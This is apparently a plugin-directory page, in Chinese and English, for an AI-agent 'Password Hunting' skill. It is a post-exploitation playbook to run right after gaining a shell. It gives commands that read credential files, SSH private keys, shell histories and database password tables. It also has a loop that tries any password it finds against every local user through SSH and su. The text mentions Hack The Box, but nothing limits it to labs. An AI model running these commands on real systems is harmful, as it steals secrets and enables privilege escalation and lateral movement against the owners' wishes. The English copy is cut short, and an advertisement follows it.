安装命令
npx skills add https://github.com/allsmog/blackbox-claude-plugin --skill 'Password Hunting'🇨🇳中文介绍
密码搜寻技能
使用时机
获取 shell 访问权限后立即使用,当需要:
- 提权至其他用户
- 寻找服务凭据
- 查找数据库密码
- 搜索 SSH 密钥
快速见效 - 首先运行这些命令
# 在常见位置搜索密码字符串
grep -rli "password" /var/www /opt /home /etc 2>/dev/null | head -20
grep -rli "passwd" /var/www /opt /home /etc 2>/dev/null | head -20
grep -rli "secret" /var/www /opt /home /etc 2>/dev/null | head -20
# 搜索特定密码模式
grep -rEi "password\s*[=:]\s*['\"]?[^'\"]+['\"]?" /var/www /opt /home 2>/dev/null
# 直接检查配置文件
cat /var/www/*/config*.php 2>/dev/null | grep -i pass
cat /var/www/*/.env 2>/dev/null
cat /opt/*/*.conf 2>/dev/null | grep -i pass
按类别划分的密码位置
Web 应用程序配置
# PHP 应用程序
find /var/www -name "config*.php" -exec grep -li password {} \; 2>/dev/null
find /var/www -name "settings*.php" -exec grep -li password {} \; 2>/dev/null
find /var/www -name "database*.php" -exec grep -li password {} \; 2>/dev/null
cat /var/www/*/wp-config.php 2>/dev/null # WordPress
cat /var/www/*/configuration.php 2>/dev/null # Joomla
# 环境文件
find / -name ".env" 2>/dev/null
find / -name ".env.local" 2>/dev/null
find / -name "*.env" 2>/dev/null
# Python
find / -name "settings.py" -exec grep -li password {} \; 2>/dev/null
find / -name "config.py" -exec grep -li password {} \; 2>/dev/null
# Node.js
find / -name "config.json" 2>/dev/null | xargs grep -l password 2>/dev/null
服务配置
# 数据库配置
cat /etc/mysql/debian.cnf 2>/dev/null
cat /var/lib/mysql/mysql.cnf 2>/dev/null
cat /etc/postgresql/*/main/pg_hba.conf 2>/dev/null
# Web 服务器
cat /etc/apache2/sites-enabled/* 2>/dev/null | grep -i password
cat /etc/nginx/sites-enabled/* 2>/dev/null | grep -i password
# FTP 服务器
cat /etc/vsftpd.conf 2>/dev/null
cat /opt/*/CrushFTP*/users/*/user.xml 2>/dev/null # CrushFTP!
# 应用程序服务器
cat /opt/tomcat*/conf/tomcat-users.xml 2>/dev/null
用户文件
# 历史文件
cat ~/.bash_history 2>/dev/null | grep -iE "pass|secret|key|token"
cat /home/*/.bash_history 2>/dev/null | grep -iE "pass|secret|key|token"
# SSH
find /home -name "id_rsa" 2>/dev/null
find /root -name "id_rsa" 2>/dev/null
cat /home/*/.ssh/id_rsa 2>/dev/null
cat /root/.ssh/id_rsa 2>/dev/null
# SSH 配置(可能包含密码)
cat /home/*/.ssh/config 2>/dev/null
# RC 文件
grep -rli password /home/*/.*rc 2>/dev/null
cat /home/*/.netrc 2>/dev/null # FTP 凭据
数据库
# SQLite 数据库
find / -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" 2>/dev/null
# 从 SQLite 提取用户
sqlite3 /path/to/database.db "SELECT * FROM users;" 2>/dev/null
sqlite3 /path/to/database.db ".tables" 2>/dev/null
# MySQL(如果我们有凭据)
mysql -u root -p -e "SELECT user,password FROM mysql.user;"
# 查找数据库转储文件
find / -name "*.sql" 2>/dev/null | head -10
备份文件
# 常见备份扩展名
find / -name "*.bak" -o -name "*.old" -o -name "*.backup" 2>/dev/null | head -20
# 配置备份
find / -name "*.conf.bak" -o -name "*.php.bak" 2>/dev/null
# Zip/tar 备份
find / -name "*.zip" -o -name "*.tar.gz" 2>/dev/null | head -10
密码模式匹配
# 通用密码模式
grep -rEi "password\s*[:=]\s*['\"]?.+['\"]?" /var/www /opt 2>/dev/null
grep -rEi "passwd\s*[:=]\s*['\"]?.+['\"]?" /var/www /opt 2>/dev/null
grep -rEi "pwd\s*[:=]\s*['\"]?.+['\"]?" /var/www /opt 2>/dev/null
# 数据库连接字符串
grep -rEi "mysql.*password|password.*mysql" /var/www /opt 2>/dev/null
grep -rEi "pgsql.*password|password.*pgsql" /var/www /opt 2>/dev/null
grep -rEi "mongodb.*password|password.*mongodb" /var/www /opt 2>/dev/null
# API 密钥/令牌
grep -rEi "api[_-]?key\s*[:=]" /var/www /opt 2>/dev/null
grep -rEi "token\s*[:=]" /var/www /opt 2>/dev/null
grep -rEi "secret\s*[:=]" /var/www /opt 2>/dev/null
特定应用程序
WordPress
cat /var/www/*/wp-config.php | grep -E "DB_|AUTH_|LOGGED_IN_|NONCE_"
Laravel/PHP
cat /var/www/*/.env | grep -E "DB_|APP_|MAIL_|AWS_"
Django
grep -E "SECRET_KEY|DATABASE|PASSWORD" /var/www/*/settings.py
CrushFTP(在 HTB 中常见!)
# 包含密码的用户配置
find /opt -path "*CrushFTP*" -name "user.xml" 2>/dev/null
cat /opt/crushftp/users/*/user.xml 2>/dev/null | grep -i password
密码复用测试
当您找到一个密码时:
PASSWORD="FoundPassword123"
USERS=$(cat /etc/passwd | grep -E "/bin/(ba)?sh" | cut -d: -f1)
# 测试 SSH
for user in $USERS; do
echo "Trying $user..."
sshpass -p "$PASSWORD" ssh -o StrictHostKeyChecking=no $user@localhost id 2>/dev/null && echo "SUCCESS: $user"
done
# 测试 su
for user in $USERS; do
echo "$PASSWORD" | su - $user -c id 2>/dev/null && echo "SUCCESS: $user"
done
输出模板
# 密码搜寻结果
## 找到的凭据
| 用户名 | 密码 | 来源 | 适用于 |
|----------|----------|--------|----------|
| admin | SuperSecret123 | /var/www/config.php | MySQL |
| ben | HouseH0ldings998 | /opt/app/.env | SSH, 本地 |
## 找到的 SSH 密钥
| 用户 | 位置 | 密码保护 |
|------|----------|-------------------|
| root | /root/.ssh/id_rsa | 否 |
| ben | /home/ben/.ssh/id_rsa | 是 |
## 数据库哈希值
| 用户名 | 哈希值 | 类型 |
|----------|------|------|
| admin | $2y$10$... | bcrypt |
## 后续步骤
1. 在 SSH 上测试找到的密码
2. 破解提取的哈希值
3. 使用 SSH 密钥进行访问
每周安装次数
0
仓库
首次出现
1970年1月1日
安全审计
🇺🇸English
Password Hunting Skill
When to Use
Use IMMEDIATELY after getting shell access when:
- Need to escalate to another user
- Looking for service credentials
- Want to find database passwords
- Searching for SSH keys
Quick Wins - Run These First
# Search for password strings in common locations
grep -rli "password" /var/www /opt /home /etc 2>/dev/null | head -20
grep -rli "passwd" /var/www /opt /home /etc 2>/dev/null | head -20
grep -rli "secret" /var/www /opt /home /etc 2>/dev/null | head -20
# Search for specific password patterns
grep -rEi "password\s*[=:]\s*['\"]?[^'\"]+['\"]?" /var/www /opt /home 2>/dev/null
# Check config files directly
cat /var/www/*/config*.php 2>/dev/null | grep -i pass
cat /var/www/*/.env 2>/dev/null
cat /opt/*/*.conf 2>/dev/null | grep -i pass
Password Locations by Category
Web Application Configs
# PHP Applications
find /var/www -name "config*.php" -exec grep -li password {} \; 2>/dev/null
find /var/www -name "settings*.php" -exec grep -li password {} \; 2>/dev/null
find /var/www -name "database*.php" -exec grep -li password {} \; 2>/dev/null
cat /var/www/*/wp-config.php 2>/dev/null # WordPress
cat /var/www/*/configuration.php 2>/dev/null # Joomla
# Environment files
find / -name ".env" 2>/dev/null
find / -name ".env.local" 2>/dev/null
find / -name "*.env" 2>/dev/null
# Python
find / -name "settings.py" -exec grep -li password {} \; 2>/dev/null
find / -name "config.py" -exec grep -li password {} \; 2>/dev/null
# Node.js
find / -name "config.json" 2>/dev/null | xargs grep -l password 2>/dev/null
广告位招租
在这里展示您的产品或服务
触达数万 AI 开发者,精准高效
